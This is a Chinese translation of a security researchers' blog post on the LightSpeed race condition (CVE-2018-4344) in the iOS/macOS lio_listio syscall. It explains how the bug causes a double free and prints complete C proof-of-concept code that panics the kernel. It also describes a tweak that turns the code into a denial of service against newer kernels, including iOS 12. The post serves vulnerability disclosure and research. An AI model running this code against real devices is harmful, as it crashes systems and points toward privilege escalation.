IOS/MacOS沙箱逃逸競賽

2019 年 10 月 8 日
筆記

前言

lio_listio和PoC中公開的iOS 11.4.1內核漏洞引起了恐慌。

iOS 12在幾周前發布了，並帶來了許多安全方面的修復和改進。特別是，這個新版本碰巧修補了我們在Synacktiv發現的一個很厲害的內核漏洞。

目前尚不清楚這個漏洞是由Apple團隊內部發現的，還是由英國國家網路安全中心(NCSC)提交的CVE-2018-4344。既然，似乎還沒有人提交它，我們就在這篇部落格文章中對它進行詳細地分析一下！

此漏洞位於lio_listio系統調用中，在競爭條件將會被觸發。它可以有效地被用於釋放兩次內核對象，從而導致潛在的UAF。

這個漏洞本身已經在大約9年前的xnu-1228和xnu-1456之間被提出，應該可以在大多數iOS多核設備上使用，直到iOS 11.4.1（包含在內）版本和MacOS的10.14版本的發布。在內部，我們將此漏洞命名為LightSpeed，因為我們在十分棘手的競爭條件下獲勝了（並且作為添加一些關於星球大戰模因的借口），但不要擔心，我們不會將其作為一種標記。

因為 listio_lio系統調用可以從任何沙箱訪問，並且由於漏洞提供了一些有趣的基本數據類型，LightSpeed可能會用于越獄iOS 11.4.1。但是，這篇博文將僅僅解釋漏洞並提供觸發內核崩潰的程式碼。

AIO系統調用介紹

正如在POSIX.1b中所定義的，XNU內核為用戶空間提供不同的系統調用以執行非同步的I/O(aio)。該標準規定各種功能,從而實現諸如 aio_read()， aio_write()， lio_listio()， aio_error()， aio_return(),…由於至少XNU-517以及大多數結構的開頭是在/bsd/sys/aio.h中，這些系統調用在 bsd/kern/kern_aio.c可以被實現。

作為對AIO函數家族的介紹， aio_read()和 aio_write()分別是 read()的 write()系統調用的非同步版本。這兩個函數都期望 structaiocb*描述要執行的 I/O請求：

struct aiocb {      int         aio_fildes;     /* File descriptor */      off_t       aio_offset;     /* File offset */      volatile void *aio_buf;     /* Location of buffer */      size_t      aio_nbytes;     /* Length of transfer */      int        aio_reqprio;     /* Request priority offset */      struct sigevent aio_sigevent;       /* Signal number and value */      int     aio_lio_opcode;     /* Operation to be performed */  };

為了執行 I/O請求，XNU首先通過該函數 aio_create_queue_entry()，將用戶結構轉換為 aio_workq_entry。然後內核通過 aio_enqueue_work()將創建的對象排入系統的aio隊列中。以下是兩種功能的原型：

static  aio_workq_entry  *  aio_create_queue_entry （proc_t  procp， user_addr_t  aiocbp，                             void  * group_tag， int  kindOfIO）;    static  void  aio_enqueue_work （ proc_t  procp， aio_workq_entry  * entryp， int  proc_locked）;

加入隊列之後，預定的工作準備好由 aio workers提取和處理， aio worker是執行函數 aio_work_thread()的內核執行緒。 aio_read()和 aio_write()系統調用可以立即返回，並且稍後通過 aio_return(), aio_error()可以請求aio的狀態。

lio_listio

介紹完了之後，我們來談談 lio_listio()。這個系統調用類似於 aio_read()和 aio_write()，它被設計用於在一個調用中調度AIO的整個列表。所以它需要aiocb的一個數組以及其他一些參數。

int lio_listio(int mode, struct aiocb *restrict const list[restrict],                           int nent, struct sigevent *restrict sig);

該mode參數指定了系統調用的行為，並且必須以下其中的一個：

LIO_NOWAIT：aio被調度，然後系統調用立即返回;
LIO_WAIT：aio被調度，然後syscall等待所有工作的完成（非同步地）。

在LIO_WAIT情況下，內核必須跟蹤整批aio。實際上，當最後一個I/O被處理時，aio worker執行緒想要喚醒仍然在系統調用中等待用戶的執行緒。

所以內核分配了一個 structaio_lio_context來處理它的 I/O(這在兩種模式下完成)：

struct  aio_lio_context  {      int      io_waiter;      int      io_issued;      int      io_completed;  };  typedef  struct  aio_lio_context  aio_lio_context;

以下是lio_listio執行的相關部分（大部分已被刪除）：

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )  {      /* lio_context allocation */      MALLOC(lio_context, aio_lio_context*, sizeof(aio_lio_context), M_TEMP, M_WAITOK);        /* userland extraction */      aiocbpp = aio_copy_in_list(p, uap->aiocblist, uap->nent);        lio_context->io_issued = uap->nent;        for ( i = 0; i < uap->nent; i++ ) {          user_addr_t my_aiocbp;          aio_workq_entry *entryp;            *(entryp_listp + i) = NULL;          my_aiocbp = *(aiocbpp + i);            /* creation of the aio_workq_entry */          /* lio_create_entry is a wrapper for aio_create_queue_entry */          result = lio_create_entry(p, my_aiocbp, lio_context, (entryp_listp+i));          if ( result != 0 && call_result == -1 )              call_result = result;            entryp = *(entryp_listp + i);            aio_proc_lock_spin(p);          // [...]          /* enqueing of the aio_workq_*/          lck_mtx_convert_spin(aio_proc_mutex(p));          aio_enqueue_work(p, entryp, 1);          aio_proc_unlock(p);      }        // [...]  }

在這裡，我們可以看到， lio_context在每個 aio_workq_entry中都被標記上了（作為 aio_create_queue_entry()中的group_tag參數）。稍後，aio worker執行緒將檢索此context，更新 lio_context->io_completed並在需要時喚醒用戶執行緒。

漏洞：LightSpeed！

我們在上一節中解釋了aioliocontext的用法，但仍然存在一個問題：誰負責釋放context？這取決於mode操作。

當liolistio在LIONOWAIT模式時被調用，系統調用中的執行緒不會等待所有I/O被執行完成。所以釋放liocontext是aio worker的工作。這是在最後一個aio被處理後，在doaio_completion常式中完成的：

static void do_aio_completion( aio_workq_entry *entryp )  {      // [...]      lio_context = (aio_lio_context *)entryp->group_tag;        if (lio_context != NULL) {            aio_proc_lock_spin(entryp->procp);          lio_context->io_completed++;            if (lio_context->io_issued == lio_context->io_completed) {              lastLioCompleted = TRUE;          }            waiter = lio_context->io_waiter;            /* explicit wakeup of lio_listio() waiting in LIO_WAIT */          if ((entryp->flags & AIO_LIO_NOTIFY) && (lastLioCompleted) && (waiter != 0)) {              /* wake up the waiter */              wakeup(lio_context);          }            aio_proc_unlock(entryp->procp);      }        // [...]      if (lastLioCompleted && (waiter == 0))          free_lio_context (lio_context);      } /* do_aio_completion */

另一方面，當調用者在LIOWAIT模式下等待時，liocontext將在lio_listio被釋放。以下是系統調用結束時的相關部分：

int lio_listio(proc_t p, struct lio_listio_args *uap, int *retval )  {      // [...]        switch(uap->mode) {      case LIO_WAIT:          aio_proc_lock_spin(p);          while (lio_context->io_completed < lio_context->io_issued) {              result = msleep(lio_context, aio_proc_mutex(p), /*...*/);                // [...]          }            /* If all IOs have finished must free it */          if (lio_context->io_completed == lio_context->io_issued) {              free_context = TRUE;          }            aio_proc_unlock(p);          break;        case LIO_NOWAIT:          break;      }        // [...]    ExitRoutine:      if ( entryp_listp != NULL )          FREE( entryp_listp, M_TEMP );      if ( aiocbpp != NULL )          FREE( aiocbpp, M_TEMP );      if ((lio_context != NULL) &&          ((lio_context->io_issued == 0) || (free_context == TRUE))) {          free_lio_context(lio_context);      }        // [...]        return( call_result );    } /* lio_listio */

前面的程式碼有一個小小的漏洞，可以在LIONOWAIT模式下被觸發。最後一部分的test (liocontext->ioissued == 0)是在沒有I/O被調度時，一個釋放context的錯誤處理案例。例如，當用戶向I/O發出請求，但它們都有LIONOP作為aiolioopcode（而不是LIOREAD或LIOWRITE）時，這就有可能發生。

但是，在執行時，先前的檢查是錯誤的，並且由於其他內核執行緒可能已經篡改了，因此lio_context無法得到保證。

重點來了！

如果我們有超快的aio worker，甚至可以在系統調用結束之前執行我們所有的I/O，liocontext可能已經被釋放並且已經被再次使用了。實際上，一旦aio被安排上，worker只需要調用者的pmlock程式開始工作，並且lio_listio會在多個時間釋放它。

因此，如果liocontext被釋放並且再次使用，那麼liocontext->ioissued可能為零。在這種情況下，liolistio再次以調用freeliocontext()結束，並且最終釋放另一個內核分配。

資料庫crash

總而言之，我們需要按照以下順序才能觸發漏洞：

1.調用liolistio()來分配aioliocontext以及調度一些aio，然後在系統調用結束之前進行context切換; 2.aio worker執行緒執行所有調度的I/O，並釋放aioliocontext; 3.kalloc.16池中的分配（aioliocontext的大小）再次使用與aioliocontext相同的分配; 4.在分配的第二個雙字值中寫入零(來進行liocontext->ioissued == 0); 5.context切換以繼續推遲liolistio調用並引起分配釋放。

步驟3和4是強制性的。實際上，由於alloc (kalloc16)的大小，空閑chunk最終總是會中毒(in zfree())，所以如果不重用分配，則在步驟5中liocontext->ioissued不能為零。在步驟5之後，如果未保持分配，並且內核嘗試釋放它，則系統將發生混亂。

以下程式碼展示了這種混亂(github link)（https://github.com/synacktiv/lightspeed）：

#include <stdio.h>  #include <string.h>  #include <stdlib.h>  #include <fcntl.h>  #include <unistd.h>  #include <aio.h>  #include <sys/errno.h>  #include <pthread.h>  #include <poll.h>    /* might have to play with those a bit */  #if MACOS_BUILD  #define NB_LIO_LISTIO 1  #define NB_RACER 5  #else  #define NB_LIO_LISTIO 1  #define NB_RACER 30  #endif    #define NENT 1    void *anakin(void *a)  {      printf("Now THIS is podracing!n");        uint64_t err;        int mode = LIO_NOWAIT;      int nent = NENT;      char buf[NENT];      void *sigp = NULL;        struct aiocb** aio_list = NULL;      struct aiocb*  aios = NULL;        char path[1024] = {0};  #if MACOS_BUILD      snprintf(path, sizeof(path), "/tmp/lightspeed");  #else      snprintf(path, sizeof(path), "%slightspeed", getenv("TMPDIR"));  #endif        int fd = open(path, O_RDWR|O_CREAT, S_IRWXU|S_IRWXG|S_IRWXO);      if (fd < 0)      {          perror("open");          goto exit;      }        /* prepare real aio */      aio_list = malloc(nent * sizeof(*aio_list));      if (aio_list == NULL)      {          perror("malloc");          goto exit;      }        aios = malloc(nent * sizeof(*aios));      if (aios == NULL)      {          perror("malloc");          goto exit;      }        memset(aios, 0, nent * sizeof(*aios));      for(uint32_t i = 0; i < nent; i++)      {          struct aiocb* aio = &aios[i];            aio->aio_fildes = fd;          aio->aio_offset = 0;          aio->aio_buf = &buf[i];          aio->aio_nbytes = 1;          aio->aio_lio_opcode = LIO_READ; // change that to LIO_NOP for a DoS :D          aio->aio_sigevent.sigev_notify = SIGEV_NONE;            aio_list[i] = aio;      }        while(1)      {          err = lio_listio(mode, aio_list, nent, sigp);            for(uint32_t i = 0; i < nent; i++)          {              /* check the return err of the aio to fully consume it */              while(aio_error(aio_list[i]) == EINPROGRESS) {                  usleep(100);              }              err = aio_return(aio_list[i]);          }      }    exit:      if(fd >= 0)          close(fd);        if(aio_list != NULL)          free(aio_list);        if(aios != NULL)          free(aios);        return NULL;  }    void *sebulba()  {      printf("You're Bantha poodoo!n");      while(1)      {          /* not mandatory but used to make the race more likely */          /* this poll() will force a kalloc16 of a struct poll_continue_args */          /* with its second dword as 0 (to collide with lio_context->io_issued == 0) */          /* this technique is quite slow (1ms waiting time) and better ways to do so exists */          int n = poll(NULL, 0, 1);          if(n != 0)          {              /* when the race plays perfectly we might detect it before the crash */              /* most of the time though, we will just panic without going here */              printf("poll: %x - kernel crash incomming!n",n);          }      }        return 0;  }    void crash_kernel()  {      pthread_t *lio_listio_threads = malloc(NB_LIO_LISTIO * sizeof(*lio_listio_threads));      if (lio_listio_threads == NULL)      {          perror("malloc");          goto exit;      }        pthread_t *racers_threads = malloc(NB_RACER  * sizeof(*racers_threads));      if (racers_threads == NULL)      {          perror("malloc");          goto exit;      }        memset(racers_threads, 0, NB_RACER * sizeof(*racers_threads));      memset(lio_listio_threads, 0, NB_LIO_LISTIO * sizeof(*lio_listio_threads));        for(uint32_t i = 0; i < NB_RACER; i++)      {          pthread_create(&racers_threads[i], NULL, sebulba, NULL);      }      for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)      {          pthread_create(&lio_listio_threads[i], NULL, anakin, NULL);      }        for(uint32_t i = 0; i < NB_RACER; i++)      {          pthread_join(racers_threads[i], NULL);      }      for(uint32_t i = 0; i < NB_LIO_LISTIO; i++)      {          pthread_join(lio_listio_threads[i], NULL);      }    exit:      return;  }    #if MACOS_BUILD  int main(int argc, char* argv[])  {      crash_kernel();        return 0;  }  #endif

修復和結論

雖然最新的XNU源（4570.71.2）仍然存在該漏洞，但該漏洞在iOS 12版本中得到了修復（至少從beta 4開始）。

以下是系統調用結束時Hex-Rays Decompiler的輸出：

此程式碼可能是以下編譯的結果：

if  （（free_context  ==  TRUE） &&  （lio_context  ！=  NULL）） {      free_lio_context（lio_context）;  }

一方面，該修補程式修復了liocontext上的潛在的UAF。但另一方面，修復之前處理過的錯誤情況現在被忽略了…因此，可以使liolistio()分配一個永遠不會被內核釋放的aioliocontext。這給了我們一個錯誤的DoS，它會使最近的內核停止相應（包括iOS 12）。

要測試它，只需將PoC上的LIOREAD更改為LIONOP，並將NB_RACER設置為0。

最後，我們很高興在此部落格文章中公開了此漏洞，我們希望您喜歡。此漏洞在iOS 11.4.1上仍然可觸發，因此可以嘗試從中構建越獄（雖然用其他已披露的漏洞可能會更容易）。

對於其他的，在未來我們將看到Apple是否會用patch :D修復他們引入的小型DoS。

非常感謝我的同事們幫助完成這篇博文章。

原文鏈接：https://www.synacktiv.com/posts/exploit/lightspeed-a-race-for-an-iosmacos-sandbox-escape.html?tdsourcetag=spcqqaiomsg